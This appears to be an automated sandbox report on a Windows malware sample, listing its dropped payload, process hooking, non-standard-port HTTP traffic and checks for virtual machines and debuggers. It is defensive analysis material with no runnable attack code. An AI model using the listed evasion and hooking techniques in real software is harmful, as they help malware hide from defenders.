Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdbSHA256A) source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Console.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdbSHA256 ] source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
PE file contains an invalid checksum
Source: decrypted_app_1.exe.0.dr Static PE information: real checksum: 0x7291ff should be: 0x784364
PE file contains sections with non-standard names
Source: mDHwap5GlV.exe Static PE information: section name: .CLR_UEF
Source: mDHwap5GlV.exe Static PE information: section name: .didat
Source: mDHwap5GlV.exe Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B6319D push ebp; iretd 0_2_09B6319E
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B62CD1 pushfd ; iretd 0_2_09B62CD5
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B63475 push es; iretd 0_2_09B63476
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B627B9 push ss; iretd 0_2_09B627BA
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B62358 push esi; iretd 0_2_09B62361
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B63759 pushfd ; iretd 0_2_09B6375A
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09EE4C47 push cx; ret 0_2_09EE4C88
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_0A3E7B4B push FFFFFFB1h; iretd 0_2_0A3E7B5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_046811AD push esp; ret 4_2_046811C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04680AB7 push ebp; ret 4_2_04680AC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04680B31 push esi; ret 4_2_04680B32
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001BB8 push eax; ret 7_2_03001C0C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001BE9 push eax; ret 7_2_03001C0C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300721D push ecx; ret 7_2_03007230
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005283 push dword ptr [esp+34h]; retn 0038h 7_2_0300527D
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001287 pushad ; ret 7_2_03001288
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001128 pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005016 push eax; ret 7_2_03005037
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030010CE pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030010E7 pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002E4A pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002EAF pushad ; ret 7_2_03002EB1
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004EFC push eax; ret 7_2_03004F5C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001529 pushad ; ret 7_2_0300152D
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004D2A push eax; ret 7_2_03004D36
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004D51 push eax; ret 7_2_03004D55
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002D76 pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002D7D pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001D8A push eax; ret 7_2_03001DAC
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002DA4 pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002DAB pushad ; ret 7_2_03002E02
Drops PE files
Source: C:\Users\user\Desktop\mDHwap5GlV.exe File created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: PID: 3732 base: 76F02EC0 value: E9 3B D1 FB 8B Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49805
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058D3 7_2_030058D3
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058EE 7_2_030058EE
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C38 7_2_03005C38
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C53 7_2_03005C53
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe System information queried: FirmwareTableInformation Jump to behavior
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API/Special instruction interceptor: Address: 3030AE8
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API/Special instruction interceptor: Address: 3030B19
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030A88 second address: 3030A8A instructions: 0x00000000 rdtsc 0x00000002 rdtsc
